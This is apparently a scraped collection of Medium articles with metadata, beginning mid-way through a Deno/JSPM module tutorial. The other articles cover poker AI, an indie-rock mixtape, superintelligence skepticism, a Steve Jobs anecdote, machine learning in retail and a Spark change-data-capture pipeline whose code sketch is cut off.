import webPush from "https://dev.jspm.io/web-push"; I can now use it like any other module in deno. This almost worked 100%. Some of the bits which relied on specific node behaviors, such as making network requests, failed; in this situation I had to work around this by using the standardised fetch API deno uses.
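To give a rough idea of what method 3 looks like end to end, the tiny script below pulls the CommonJS web-push package through the JSPM CDN and uses it to generate a VAPID key pair (the use case described above). It is only a sketch: it assumes the JSPM build exposes the npm package’s generateVAPIDKeys() helper unchanged, and that this particular code path does not hit the Node-only networking behaviour mentioned above.

// vapid.ts — run with: deno run vapid.ts
// Sketch only: assumes the JSPM build of web-push exposes generateVAPIDKeys()
// just like the npm package does, and that it needs no Node-only APIs here.
import webPush from "https://dev.jspm.io/web-push";

const keys = webPush.generateVAPIDKeys(); // returns { publicKey, privateKey }
console.log("VAPID public key: ", keys.publicKey);
console.log("VAPID private key:", keys.privateKey);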
Getting Typescript types working One nice feature of typescript, which deno uses, is that it provides really good autocomplete for modules. The deno extension for my editor can even autocomplete for third party modules if it knows the type definitions. This isn’t essential to getting the code to work but can provide huge benefits for helping you maintain your code. When I was importing another module called fast-xml-parser, I noticed while looking through the source code that it had a type definitions file, which is a file which ends in .d.ts . These files describe the various interfaces and work even for JavaScript .js files. You can sometimes also find the type definitions files in the @types/somemodule repo. Using this file, typescript can autocomplete on things imported from JavaScript files. Even for files imported using JSPM: // Import the fast-xml-parser library import fastXMLParser from "https://dev.jspm.io/fast-xml-parser"; // Import the type definition file from the source code of fast-xml-parser import * as FastXMLParser from "https://raw.githubusercontent.com/NaturalIntelligence/fast-xml-parser/master/src/parser.d.ts"; // Use the parser with the types const parser = fastXMLParser as typeof FastXMLParser; I import the type definitions from the definition files as FastXMLParser (note the uppercase F); this doesn’t contain any working code but is an object which has the same type as the code we want to import. I import the code from JSPM as fastXMLParser (lowercase f) which is the working code but has no types. Next I combine them together to make parser which is fastXMLParser with the type of FastXMLParser . Thank you for reading, I hope you give deno a go. The ability to use any module made for the web and even some which were made for node/npm really gives this new server side library ecosystem a good foundation to get started from. 🦕
https://medium.com/samsung-internet-dev/using-node-modules-in-deno-2885600ed7a9
['Ada Rose Cannon']
2020-08-03 12:14:52.404000+00:00
['Deno', 'Nodejs', 'JavaScript', 'Samsung Internet', 'Web Development']
Poker? Done that. Now the next challenge…
IMAGE: Yuriy Davats — 123RF Poker, as has previously happened to chess and Go, has joined the games that a set of algorithms is already capable of playing better than the human champions can manage. On January 31, after twenty days of Heads Up, No Limit Texas Hold ’em, four people considered among the best professional poker players in the world were defeated by an artificial intelligence machine, Libratus, the product of the work of researchers at Carnegie Mellon directed by Tuomas Sandholm. Twenty days watching computer screens, playing about 120,000 hands, and meeting at night in their hotel rooms to coordinate joint strategies were not enough to beat an algorithm that quickly understood the strategies employed by the humans and soon overcame them. The game was clearly dominated by Libratus from the first moment: the human players were not even close to winning at any time. The aim of keeping the championship going to the end was to achieve a victory that could be considered statistically significant, that is to say, a result that with 99.7% confidence is not the product of chance. What really matters here is that the algorithms used were not specific to the game of poker, nor did they try to exploit the mistakes of Libratus’s opponents. They simply took the rules of the game as their inputs and focused on improving their own strategy by taking into account the cards dealt, those on the table and the bets placed by each player. Texas Hold ’em, with its unlimited betting and the uncertainty of two hidden cards on whose potential values players speculate, offers a very good example of imperfect information play, and serves as an appetizer for other non-gambling activities such as negotiation, cybersecurity, finance, or even research on antiviral treatments (taking the mutations of the virus, whose genetic sequence is known, as uncertain variables that allow it to survive certain drugs). There are plenty of areas similar to poker: we’re no longer speaking about a machine that can learn the rules of a game and apply computational brute force to calculate. What Libratus’s victory means in simple terms is that artificial intelligence is better at making strategic decisions based on uncertain information than humans are. If you thought that a machine was only capable of repeating what it had been programmed to do, think again: a machine has been able to analyze 120,000 poker moves and, given the cards dealt to it, the cards already on the table and the bets of each of its opponents, consistently win on a statistically significant number of occasions, enough to rule out luck or chance. So next time you sit down to play a hand of poker, remember that no matter how well you do, there is a machine out there that will always beat you. And from now on, that won’t just apply to card games…
https://medium.com/enrique-dans/poker-done-that-now-the-next-challenge-330b67b11a28
['Enrique Dans']
2017-02-02 22:29:22.028000+00:00
['AI', 'Poker', 'Algorithms', 'Artificial Intelligence', 'Machine Learning']
The Mixtape for Indie Rock Lovers Vol. 1
The Mixtape for Indie Rock Lovers Vol. 1 Rewind. Record. Repeat. As a late-’80s kid, I found that the joy of discovering new music through hand-crafted compilations was easily shared through mixtapes. And even though I missed a portion of that era, I still remember running to my cassette player to hit record only to find out later that the first 30 seconds were missing. When cassette tapes became a thing of the past, CD burners made their way to the music scene and, of course, I was pretty stoked to make my first mix. There was an art to crafting our own playlists that we could hand out to our friends, and accessing music through Spotify just doesn’t have the same je ne sais quoi. Before we get started, I just want to let you know that I spiralled down a black hole trying to define the term indie rock — which led me to create a lengthy article explaining the history behind it. Despite the slight distinctions in origins, calling this an “alternative” playlist could have been a better option. But in retrospect, creating my own sub-genres was a more exciting idea.
https://medium.com/narrative/the-mixtape-for-indie-rock-lovers-vol-1-e89a6cfddbbc
['Katy Velvet']
2019-05-04 06:40:20.985000+00:00
['Inspiration', 'Culture', 'Ideas', 'Creativity', 'Music']
Superintelligence Vs. You
Supposedly atheist intellectuals are now spending a lot of time arguing over the consequences of creating “God.” Often they refer to this supreme being as a “superintelligence,” an A.I. that, in their thought experiments, possesses magical traits far beyond just enhanced intelligence. Any belief system needs a positive and negative aspect, and for this new religion-replacement, the “hell” scenario is that this superintelligence we cannot control might decide to conquer and destroy the world. Like their antecedents—Hegel, Marx, J.S. Mill, Fukuyama, and many others—these religion-replacement proposers view history as a progression toward some endpoint (often called a “singularity”). This particular eschaton involves the creation of a superintelligence that either uplifts us or condemns us. The religious impulse of humans—the need to attribute purpose to the universe and history—is irrepressible even among devoted atheists. And, unfortunately, this worldview has been taken seriously by normally serious thinkers. I and others have argued that rather than new technologies leading to some sort of end-of-history superintelligence, it’s much more likely that a “tangled bank” of all sorts of different machine intelligences will emerge: some small primitive A.I.s that mainly filter spam from email, some that drive, some that land planes, some that do taxes, etc. Some of these will be much more like individual cognitive modules, others more complex, but they will exist, like separate species, adapted to a particular niche. As with biological life, they will bloom across the planet in endless forms, most beautiful. This view is a lot closer to what’s actually happening in machine learning on a day-to-day basis. Evolution is an endless game that’s fundamentally nonprogressive. The logic behind this tangled bank is based on the fundamental limits of how you can build an intelligence as an integrated whole. Just like evolution, no intelligence can be good at solving all classes of problems. Adaptation and specialization are necessary. It’s this fact that ensures evolution is an endless game and makes it fundamentally nonprogressive. Organisms adapt to an environment, but that environment changes, maybe even due to that organism’s adaptation, and so on, for however long there is life. Put another way: Being good at some things makes it harder to do others, and no entity is good at everything. In a nonprogressive view, intelligence is, from a global perspective, very similar to fitness. Becoming more intelligent at X often makes you worse at Y, and so on. This ensures that intelligence, just like life, has no fundamental endpoint. Human minds struggle with this view because without an endpoint there doesn’t seem to be much of a point either. Despite the probable incoherence of a true superintelligence (all knowing, all seeing, etc.), some argue that, because we don’t fully know the formal constraints on building intelligences, it may be possible to build something that’s superintelligent in comparison to us and that operates over a similar class of problems. This more nuanced view argues that it might be possible to build something more intelligent than a human over precisely the kinds of domains humans are good at. This is kind of like an organism outcompeting another organism for the same niche. Certainly this isn’t in the immediate future.
But let’s assume, in order to show that concerns about the creation of superintelligence as a world-ending eschaton are overblown, that it is indeed possible to build something 1,000x smarter than a human across every problem-solving domain we engage in. Even if that superintelligence were created tomorrow, I wouldn’t be worried. Such worries are based on a kind of Doctor Who-esque being. A being that, in any circumstance, can find some advantage via pure intelligence that enables victory to be snatched from the jaws of defeat. A being that, even if put in a box buried underground, would, just like Doctor Who, always be able to use its intelligence to both get out of the box and go on to conquer the entire world. Let’s put aside the God-like magical powers often granted superintelligences—like the ability to instantaneously simulate others’ consciousnesses just by talking to them or the ability to cure cancer without doing any experiments (you cannot solve X just by being smart if you don’t have sufficient data about X; ontology simply doesn’t work that way)—and just assume it’s merely a superintelligent agent lacking magic. The important thing to keep in mind is that Doctor Who is able to continuously use intelligence to solve situations because the show writers create it that way. The real world doesn’t constantly have easy shortcuts available; in the real world of chaotic dynamics and P!=NP and limited data, there aren’t orders-of-magnitude more efficient solutions to every problem in the human domain of problems. And it’s not that we fail to identify these solutions because we lack the intelligence. It’s because they don’t exist. An example of this is how often superintelligence can be beaten by a normal human at all sorts of tasks, given either the role of luck or small asymmetries between the human and the A.I. For example, imagine you are playing chess against a superintelligence of the 1,000x-smarter-than-humans-across-all-human-problem-solving-domains variety. If you’re one of the best chess-players in the world, you could at most hope for a tie, although you may never get one. Now let’s take pieces away from the superintelligence, giving it just pawns and its king. Even if you are, like me, not well-practiced at chess, you could easily defeat it. This is simply a no-win scenario for the superintelligence, as you crush it on the board, mercilessly trading piece for piece, backing it into a corner, finally toppling its king. That there are natural upper bounds on performance from being intelligent isn’t some unique property of chess and its variants. In fact, as strategy games get more complex, intelligence often matters less. Because the game gets chaotic, predictions are inherently less precise due to amplifying noise, available data for those predictions becomes more limited, and brute numbers, positions, resources, etc., begin to matter more. Let’s bump the complexity of the game you’re playing against the superintelligence up to the computer strategy game Starcraft. Again, assuming both players start perfectly equal, let’s grant the superintelligence an easy win. But, in this case, it would take only a minor change in the initial conditions to make winning impossible for the superintelligence. Tweaking, say, starting resources would put the superintelligence into all sorts of no-win scenarios against even a mediocre player. Even just delaying the superintelligence from starting the game by 30 seconds would probably be enough for great human players to consistently win. 
You can give the superintelligence whatever properties you want—maybe it thinks 1,000x faster than a human. But its game doesn’t run 1,000x faster, and by starting 30 seconds earlier, the human smokes it. The point is that our judgments on how effective intelligence alone is for succeeding at a given task are based on situations when all other variables are fixed. Once you start manipulating those variables, instead of controlling for them, you see that intelligence is only one of many things that affect the outcome of even the most strategic games—and often not a very important one. We can think of a kind of ultimate strategy game called Conquer the World. You’re born into this world with whatever resources you start with, and you, a lone agent, must conquer the entire earth and all its nations, without dying. I hate to break it to you: There’s no way to consistently win this game. It’s not just because it’s a hard game. It’s because there is no way to consistently win this game, no matter your intelligence or strategy—it just doesn’t exist. The real world doesn’t have polarity reversals and there are many tasks with no shortcuts. The great whirlwind of limbs, births, deaths, careers, lovers, companies, children, consumption, nations, armies—that is, the great globe-spanning multitudinous mass that is humanity—has so many resources and numbers and momentum it is absurd to think that any lone entity could, by itself, ever win a war against us, no matter how intelligent that entity was. It’s like a Starcraft game where the superintelligence starts with one drone and we start with literally the entire map covered by our bases. It doesn’t matter how that drone behaves, it’s just a no-win scenario. Barring magical abilities, a single superintelligence, with everything beyond its senses hidden in the fog of war, with limited data, dealing with the exigencies and chaos and limitations that define the physical world, is in a no-win scenario against humanity. And a superintelligence, if it’s at all intelligent, would know this. Of course, no thought experiment or argument is going to convince someone out of a progressive account of history, particularly if the progressive account operates to provide morality, structure, and meaning to what would otherwise be a cold and empty universe. Eventually the workers must rise up, or equality for all must be achieved, or the chosen nation-state must bestride the world, or we must all be uplifted into a digital heaven or thrown into oblivion. To think otherwise is almost impossible. Human minds need a superframe that contains all others, that endows them with meaning, and it’s incredibly difficult to operate without one. This “singularity” is as good as any other, I suppose. Humans just don’t do well with nonprogressive processes. The reason it took so long to come up with the theory of evolution by natural selection, despite its relatively simple logic and armchair-derivability, is its nonprogressive nature. These are things without linear frames, without beginnings or ends or reasons why. When I was studying evolutionary theory back in college, I remember at one moment feeling a dark logic click into place: Life was inevitable, design inevitable, yet it needed no watchmaker and had no point, and that this pointlessness was the reason why I was, why everyone was.
But such a thought is slippery, impossible to hold onto for a human, to really keep believing in the trenches of the everyday. And so, when serious thinkers fall for silly thoughts about history coming to an end, we shouldn’t judge. Each of us, after all, engages in such silliness every morning when we get out of bed.
https://medium.com/s/story/superintelligence-vs-you-1e4a77177936
['Erik Hoel']
2019-02-05 22:18:39.533000+00:00
['Machine Learning', 'Technology', 'Artificial Intelligence', 'Robots', 'Future']
Steve Jobs’ Dark Past
Steve Jobs’ Dark Past The time Steve Jobs cheated his way to success Image source: (Photo by Reuters) Steve Wozniak on Breakout, Atari and Steve Jobs I believe that most people have a dark past, a past that they wish would never come to light, but sooner or later you have to take that pressure off your chest and come clean. This is what Steve Jobs did about the way he tricked his best friend into working all night long for several days and then cheated him out of his paycheck. This proved to be only the first offense in a long litany of his penchant for pettiness and pointless cruelty. The friend that I am talking about is Steve Wozniak; he and Jobs were working at Atari, one of the first video game companies, which revolutionized the video game market. The owner of Atari at the time was its founder, Nolan Bushnell. The first game that came out was “Pong,” a classic which many people remember. Due to its high success, Bushnell thought of making a single-player sequel, “Breakout,” in 1975. Appearances can be deceiving For this project, Bushnell was thinking of putting Steve Jobs in charge. Jobs was considered (at the time) a low-level Atari technician with huge potential. As this game was expected to be much better than its predecessor, Jobs recruited Steve Wozniak, who was known on the market as the better engineer. Jobs and Wozniak had been friends for quite some time at that point. They were both working towards the Apple 1, which would go on to become the most iconic computer around the world for four long years, so they got to spend a lot of time together. The way that Atari worked was by offering a monetary bonus for every chip fewer than fifty that was used when building a game. Wozniak was ecstatic when Jobs asked him to help with this big project. This is when Jobs started to lie to Wozniak in order to use him for his expertise. He told Wozniak that the deadline was four days and that he had to use as few chips as possible. The truth is that Jobs was given a whole month for this project, not four days. Jobs never told Wozniak about the bonus for using fewer chips and the four-day deadline was self-imposed by Jobs, as he needed to get back to his commune farm to help bring in the apple harvest. It is imperative to mention (for those who are not aware) that Steve Jobs came from a very poor background. Wozniak was working for Hewlett-Packard at the time as well, so he had to balance his main job as well as this project. So he would end up going to his job in the day time and spending most of the night working on “Breakout”. The only thing that Jobs did was implement the required chips, making sure that there were fewer than fifty. Their herculean efforts succeeded, as they finished the game in four days using only forty-five chips. When payday came, Steve Jobs gave Wozniak only half the pay; he kept the rest, as well as the bonus, for himself. Wozniak only found out about this ten years later. He is quoted in the Isaacson biography Steve Jobs: “When he talks about it now, there are long pauses, and he admits it causes him pain.” “I wish he had just been honest. If he had told me he needed the money, he should have known I would have just given it to him. He was a friend. You help your friends.” “Ethics always mattered to me, and I still don’t understand why he would have gotten paid one thing and told me he’d gotten paid another. 
But, you know, people are different.” Quotes are taken from Steve Jobs: The Exclusive Biography by Walter Isaacson. Wozniak, to his credit, did not hold this against Jobs in later years. The reason why Jobs did this is unknown to the public; many think it was his need for money to keep on working on the Apple 1 computer, whilst others say that those are his true colors. I am not here to judge Steve Jobs, as I believe we have all, at some point in time, chosen the wrong path, especially in our younger years.
https://medium.com/history-of-yesterday/steve-jobss-dark-past-55a98044f3b4
['Andrei Tapalaga']
2020-11-06 14:21:13.517000+00:00
['History', 'Marketing', 'Business', 'Life Lessons', 'Entrepreneurship']
Complete guide to machine learning and deep learning in retail
Complete guide to machine learning and deep learning in retail The stores aren’t dead yet Stores are changing. We see it happening before our eyes, even if we don’t always realize it. Little by little, they are becoming just one extra step in an increasingly complex customer journey. Thanks to digitalisation and retail automation, the store is no longer an end in itself, but a means of serving the needs of the brand at large. The quality of the experience, a feeling of belonging and recognition, the comfort of the purchase… all these parameters now matter as much as sales per square meter, and must therefore submit themselves to the optimizations prescribed by Data Science and its “intelligent algorithms” (aka artificial intelligence in the form of machine learning and deep learning). The use of artificial intelligence is, above all, a competitive necessity. Indeed, e-commerce players did not wait on anyone: note, for example, the adaptation of online search results to the end customer, or the recommendations made based on a digital profile. These two aspects are impossible for brick and mortar (for now). However, physical commerce has its own strengths. Olfactory, visual, auditory and other data can be used to give the consumer a feeling of having experienced something unique and made specifically for them. In addition to customer relationship improvements, artificial intelligence also makes it possible to seek the resolution of problems that have long represented a burden for retailers: better inventory management, optimization of store space, optimization of employee time… We present below a complete look at deep learning/machine learning use cases implemented to create the store of the future, supported by real-life examples. 1. Adapting the store and its inventory to better serve customers It’s a known fact that e-commerce actors can optimize their websites in real time using dynamic statistics. This allows them to define the most effective strategies according to the resources available and predefined customer segmentation. Like any physical space, the store does not have this luxury. However, this does not prevent the periodic optimization of physical spaces, thanks to insights gleaned from intelligent algorithms. Back in the day (less than 20 years ago), we’d hire students to follow and count customers in specific areas of the store. Thankfully, these times are over. Heat-maps, average route diagrams, time spent on screens, various ratios in relation to total attendance, correlations… the cameras in store and computer vision algorithms now provide actionable tools based on images. Today, heat-mapping and activity recognition solutions help not only to position promotions, but also to create entire marketing strategies, and to measure the performance of each department, as well as that of product placements. Solutions offered by the likes of RetailFlux can analyze store videos to give retailers data on the number of people in their store, the path they take once inside and where they linger. This helps marketers identify popular locations, allowing them to change the layout of furnishings, displays, advertising or staff to better serve their customers and increase revenue. 
As technologies evolve, we are also starting to hear about “demographic recognition”: these tools, created by start-ups such as DeepVision AI, MyStore-e, RetailDeep and RetailNext, allow us to estimate the age and gender of people passing in front of a camera, thus giving stores access to a whole new granularity of analysis. This aspect is paramount to the rationalisation now expected of marketers and category managers. Although these cameras are often hung from the ceiling, this is not always the case: Walgreens (in partnership with Cooler Screens), for example, recently integrated cameras, sensors and digital screens in the doors of its stores’ coolers to create a network of “smart” displays that brands can use to target ads to specific types of customers. The doors act as a digital merchandising platform that depicts food and beverages in their best light, but also as an in-store billboard that can show ads to consumers who are approaching, based on variables such as approximate age, gender and current weather. Cameras and sensors inside the connected coolers can also determine which items buyers have picked up or viewed, giving advertisers insight into how their promotions work on the screen, and quickly notifying a retailer if a product is no longer in stock. The key question thus shifts from “where” and “how many” to “who”, “when”, “how often”, “how long” and “for how many cookies?”. 2. Forecasting to increase profits These data, mixed with those from check-outs and loyalty programs, are key to forecasting demand and creating store clusters, which in turn improves retailers’ supply chains. By better predicting what products will do well in a certain area, machine learning algorithms from startups such as Symphony RetailAI can reduce dead stock, help optimise pricing (and profits), and increase customer loyalty (people obviously tend to enjoy finding the right product mix in their nearest store). Indeed, unsold stock might be one of the retail industry’s biggest handicaps: unused inventory costs U.S. retailers about $50 billion a year. Reducing this number is key to the industry’s long-term survival: every dollar spent on what becomes dead inventory is valuable money that could have been put towards training talent, better R&D, or, most obviously, brand new smart algorithms. Forecasting also helps retailers optimise their promotions: the less dead stock there is in the warehouse, the more strategic promotions can be, instead of being merely reactive. Many pricing aficionados will particularly appreciate this aspect, as it will make their job a lot easier, and a lot less thankless. 3. Personalisation to promote an in-store experience In the same way that a website can adapt in real time to end users, an increased granularity of computer vision is also possible in stores, allowing it to target individuals. However, these algorithms are based on more elements than the ones presented above, and are thus more complex/less reliable. To work at a personal level, the algorithms need a mix of demographic recognition, loyalty code identification, and augmented reality, often integrated into smart objects such as mirrors. Although they cannot (yet) be implemented on a large scale, these solutions exemplify a profound change in the way stores sell. We are moving from the sale of products to the sale of experiences, where the physical offer becomes a by-product. This is the concept of shoppertainment. 
Low prices and an extensive catalog are no longer enough for customers, who can find such a value proposition online. An authentic brand experience becomes key to survival: the store is a storehouse of engaging experiences, ideas and interactions. The use cases are of course numerous (even if they often border on the sci-fi technobabble side of the AI equator): during 2019’s NRF, Google presented a connected mirror which links visual recognition data and the store’s product database. In the case of an optical store for example, the mirror can recognize the model tested and display product or marketing information concerning it. The sellers also have statistics on the use of the mirror in real time: they know that the person who has tried a certain type of glasses has been there for some time or hesitates between two pairs. This facilitates the work of the seller who can thus advise the customer on the products which really interest them. H&M has for its part allied itself with Microsoft to test a mirror that allows shoppers to take selfies using voice commands, while Lululemon’s mirror acts more like a board which encourages its customers to engage with the community created and maintained by the brand. Smart mirrors can of course be placed at different points of the purchasing process: Ralph Lauren’s is located in the fitting room to transform the often frustrating experience of trying on clothes. Buyers can interact with the mirror to change the lighting in their fitting room and can select different sizes or colors for their outfits, which an employee will get. The mirror also recommends other items that would go well with what is being tried. Cosmetic companies have also adopted these solutions: the Sephora smart mirror uses an intelligent algorithm which mixes the gender, age, appearance and style of the person looking at it in order to make recommendations. It even claims to differentiate between people wearing neutral or bright colors, daring or conservative styles and clothes with floral and geometric patterns to name a few. Through deep learning, we are also seeing a new technique emerge: affective computing. It is the ability of computers to recognize, interpret, and possibly simulate emotions. It is indeed possible to identify gestures such as head and body movements, while a voice’s tone can also speak volumes about an individual’s emotional state. These insights can be used in the store so as not to inconvenience a customer who clearly does not want to be helped or bothered. These technologies are nevertheless new (only Releyeble offers retail use cases) and intrusive: it is therefore preferable not to comment yet on future use cases. 4. Making the shopping experience smoother for the customer Mirrors, augmented reality, virtual reality … they rarely respond to real pain points for retailers and their customers. And we know these pain points by heart: checkout length, finding products quickly, and inventory management… those should be priorities for stores looking for ways to use machine learning and deep learning solutions. Reducing friction at checkout In China, for example, customers of certain KFCs can, thanks to Alipay technology, make a purchase by placing themselves in front of a POS equipped with cameras, after having linked an image of their face to a digital payment system or bank account. 
The American chain Caliburger has also tested the idea of facial recognition in some of its restaurants: the first time customers order using in-store kiosks, they are invited to link their faces to their account using NEC’s NeoFace facial recognition software in order to benefit from numerous advantages. Payment by bank card is still necessary, but the company intends to switch to payment by facial recognition if the initial test phase is successful. Fears over cybersecurity could however prevent this kind of solution from seeing the light of day on a large scale. Indeed, customers are more and more protective of their personal data (and rightly so): according to a Wavestone study, only 11% of consumers are ready to submit to facial recognition in stores. For recognition by mobile application, this figure rises to 40%. Other, more viable, ways to use computer vision to make checkout more fluid are therefore being considered. We are by now all familiar with Amazon Go’s automated stores (not too familiar, one hopes), which allow customers with a Prime account to enter the store with a code on their phones, do their shopping, and exit the store without going through a checkout. An algorithm having “followed” the customer around, the amount of purchases is automatically debited, and an invoice is sent by email. Testing of this technology is also underway at Casino, in partnership with XXII. There are many start-ups in this space: Standard Cognition, Zippin, Trigo Vision… all claim to help companies eliminate checkout for customers. China, meanwhile, is casually reworking the very concept of the store through the Bingo-Box by Auchan. Reducing stock-outs All these cameras can be used to see more than customers: many solutions for monitoring shelves have indeed emerged. They offer to send an alert to employees in the event of a shortage, which allows for a prompt response. This is key for stores: stockouts represent more than $129 billion in lost sales in North America each year (~4% of revenues). Not only that, but stock-outs can also actively drive customers into the arms of the competition: 24% of Amazon’s revenue comes from customers who have experienced a stock-out at a local retailer. There are many examples of such solutions: in France, Angus AI works with Les Mousquetaires. In the US, Walmart has been working on this concept since last year, as has ABInbev with Focal Systems. Interestingly, Yoobic’s solution offers a similar process, but the camera is in the hands of individuals in order to take the photos that will be analyzed by the algorithms. In China, meanwhile, Hema (Alibaba’s store of the future) is pushing the boundaries of augmented stores more than anywhere else in the world. Shopping advice through Voice technology Of course, images aren’t the only things that can be analyzed in store; voice also has a role to play in streamlining customer journeys. This under-appreciated method of shopping is due for a small revolution: 13% of all households in the United States owned a smart speaker in 2017, per OC&C Strategy Consultants. That number is predicted to rise to 55% by 2022. The fact that Amazon is also a leader in voice technologies shows how serious the Seattle giant is in terms of its brick-and-mortar domination (having already conquered virtual spaces). The brand’s Echo Buds, launched in 2019, work with Alexa to answer any questions it understands while a customer is on the move. 
More interestingly for retail, it also informs the user if the closest Whole Foods (Amazon owns Whole Foods) has an item a customer is looking for. Once they are informed and in the store, the Echo Buds can direct them to the right aisle. You can imagine Alexa not only guiding you to an item, but if you tell it that you want to make lasagna, it could also guide you through a store, giving you the quickest way to pick up all the necessary ingredients. The future is ear (get it?). Virtual assistants are indeed on the rise. The Mars Agency, for example, has partnered with American retailer BevMo! to test SmartAisle, a digital whiskey purchase assistant. By mixing artificial intelligence, voice-activated technology and LED lights on the shelves, SmartAisle helps buyers choose the perfect whiskey bottle. Three bottles are recommended after a quick conversation, and the relevant shelves light up to lead the customer to the preferred bottles. If customers already have a brand in mind, the assistant can recommend other brands or bottles with similar flavor profiles. The whole experience lasts no more than 2 minutes. The voice assistant makes it a pleasant and informative experience, with a mix of banter and useful information. From NLP to virtual assistants, the two examples above show that, if used well, Voice technology can free up more employee time, and give key data to retailers. Robotic automation The discussion on improving and streamlining processes would not be complete without a discussion around robotics. These objects, long relegated to science fiction, are now showing their usefulness in stores around the world. Although robotics is not in itself a subcategory of artificial intelligence, robots roaming the aisles use notions of computer vision and NLP. Just like Amazon, Walmart is, here too, at the cutting edge of technology: Bossa Nova robots (called “Auto-S”), which are designed to scan items on the shelves to help with price accuracy and restocking, are already present in 1000 of their stores. These six-foot-tall devices contain 15 cameras each, which scan shelves and send alerts to employees in real time. This frees workers from the need to focus on repeatable, predictable and manual tasks, giving them time to focus more on sales and customer service. Walmart has also introduced robots that clean floors, unload and sort items from trucks and pick up orders in stores. It is interesting to note that this niche is quickly becoming highly competitive: Simbe’s robots have been deployed in Schnucks stores across America, with the same value proposition as Bossa Nova, while Lowe’s unveiled in 2016 a robot that can understand and respond to simple customer questions. Post-coronavirus, it is almost certain that the movement towards robotics will accelerate in the coming months. 5. Loss prevention “Shrinkage” (theft) has an enormous cost: €49 billion per year on a European scale (2.1% of annual turnover in the distribution sector), weighing heavily on the margins of distributors already highly pressurized by price wars. Security therefore becomes a pressing need. And because of costs, so does automation. This can take many forms. Augmented cameras, for example, can identify if a product has been hidden, and alert a human. This would, however, produce a lot of false positives due to the physical impossibility of an all-knowing camera. Companies such as Vaak or DeepCam AI claim to be able to avoid this problem by alerting someone only if the behavior of a visitor is highly suspicious. 
Solutions such as StopLift also offer to detect “sweethearting” (an employee pretending to make a transaction, but in fact giving a product to an acquaintance without payment). It is important to remember that a large percentage of store theft involves employees. The ROI of these solutions is easy to calculate: stores know exactly how much they lose from theft and errors. As such, this use case is likely to be one of the first to be implemented. Conclusion In view of all these developments, and despite their many positives for both retailers and customers, it is essential that customers question retailers about who has access to data and how it is used. It goes without saying that transparency must be the watchword of any use of personal data in order to guarantee consumers the preservation of their privacy. If you’re eager to get going with your very own corporate A.I. project, I recommend jumping straight to my latest article on the matter: 10 Steps to your very own Corporate Artificial Intelligence project.
https://towardsdatascience.com/complete-guide-to-machine-learning-and-deep-learning-in-retail-ca4e05639806
['Adrien Book']
2020-05-15 16:41:57.390000+00:00
['Retail Technology', 'AI', 'Retail', 'Artificial Intelligence', 'Deep Learning']
Orchestrating change data capture to a data lake
Orchestrating change data capture to a data lake Building change data capture (CDC) with Spark Streaming SQL What is change data capture? If you are a data engineer, CDC will not appear foreign to you. It is an approach to data integration that is based on identifying, capturing and delivering the changes made to a data source. CDC can help load the source table into your data lake. There is a huge amount of data stored in the database or application source, and the data team will want to analyze these tables. Running queries against the live production database could result in degradation of performance for the external application. The CDC process/pipeline is used to load the table to the external data lake. The apps that need access can run ETL or ad-hoc queries on the target table stored in the data lake for analysis. Possible architectural considerations There are a lot of CDC solutions, including incremental scheduled import jobs or real time jobs. Sqoop is an open source tool that could be used to transport data between Hadoop and relational databases. The team can build daily jobs which could be used to load the data into the data lake. This could still create a huge load on the database and affect performance. Hence, the schedule needs to be worked out to make sure application performance is not affected. This scenario could severely limit real time queries and analysis, on top of the limitations that Sqoop itself has. The problem with the previous architecture is the load and bottleneck it creates on the application database. To solve those issues we can use the binlog. The binlog is a set of sequential log files that record insert, update and delete operations. For this streaming CDC pipeline using the binlog, we first use an open source tool, like Debezium or Maxwell, to sync the binlog to Kafka or some other comparable service. Then the downstream apps can leverage Spark Streaming to consume the topic from Kafka in sequence, parsing the binlog records into the targeted storage system. The target could be a system that supports Insert, Update and Delete, like Kudu, Delta or HBase. This solution comes with a set of operational challenges if the data is too large, especially with Kudu. Based on the previous architectural consideration, the binlog approach will limit the load on the application database, but it will result in a few other challenges. We can solve those operational challenges and issues using Spark Streaming SQL. We can build a CDC process/pipeline using Spark Streaming SQL, driving Streaming SQL to parse the binlog and merge the changes into the data lake. Orchestration for Spark Streaming SQL SQL is a declarative language. Almost all data engineers have SQL skills, especially with databases and data warehouses like MySQL, HiveQL or Spark SQL. The advantage of using Streaming SQL is that even if developers are not familiar with Spark Streaming, Java or Scala, they can still easily develop stream processing. Additionally, it is also low cost to migrate from a batch SQL job to a Streaming SQL job. As a part of this orchestration, we should have synced the binlog of the table to Kafka using Debezium or other similar products. The binlog is a different format; hence, the binlog parser will also be different from a normal parser. We can use Spark Streaming SQL to consume the binlog from Kafka, parse the binlog according to the operation type of each record (insert, update or delete), and then merge the parsed records into the data lake. 
Internally, Spark Streaming receives live input data streams and divides the data into batches, which are then processed by the Spark engine to generate the final stream of results in batches. Step one, we create two tables: the source, which is the Kafka table, and the target Delta table. Step two, we create a streaming scan on top of the Kafka table and set some parameters in the options clause, like starting offsets and max offsets per trigger. Step three houses the major logic of the CDC pipeline: we create a stream to wrap the merge-into statement and the job parameters. Step four, we use the Streaming SQL command to launch the SQL file. This command will launch a client-mode streaming job. Once that is set and the job runs, we can view the CDC streaming pipeline. At this point, we can check that we can query the target table in the data lake; if there are data changes in the source database table, they should match. For each batch of the stream, we call Delta's merge function to merge the parsed binlog records into the target Delta table. That should finish the orchestration. Post this setup, we will need to set up monitoring and metrics on each step of this process. These metrics should provide us with values to visualize bottlenecks and the flow of data. In addition, we need to set up alerts on the operational metrics. These would allow the team to consume and respond to alerts promptly. Conclusion The process above should provide a way to set up a basic CDC pipeline which can handle billions of CDC events relatively well. We can also run update and delete operations on the Delta table. On top of this solution, the team could support schema enforcement and evolution, which provide better data quality and data management. Time travel provides snapshots of the data, so we can query any earlier version of the data. Currently only Spark can write data to Delta, in both batch mode and streaming mode, and we can leverage Presto (or Spark) to query data from Delta.
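For readers who prefer the programmatic API, here is a rough, hypothetical sketch of the same pipeline written with plain PySpark Structured Streaming and Delta Lake's merge, rather than the Streaming SQL syntax described above. Topic, path, schema and column names are made up for illustration, and a real pipeline would also have to de-duplicate multiple changes to the same key within a batch before merging.

from delta.tables import DeltaTable
from pyspark.sql import SparkSession, functions as F

spark = SparkSession.builder.appName("binlog-cdc").getOrCreate()

# Steps 1-2: a streaming source over the Kafka topic that carries the binlog.
binlog = (spark.readStream.format("kafka")
          .option("kafka.bootstrap.servers", "broker:9092")
          .option("subscribe", "mysql.binlog.orders")          # assumed topic name
          .option("startingOffsets", "latest")
          .option("maxOffsetsPerTrigger", 10000)
          .load()
          .selectExpr("CAST(value AS STRING) AS json"))

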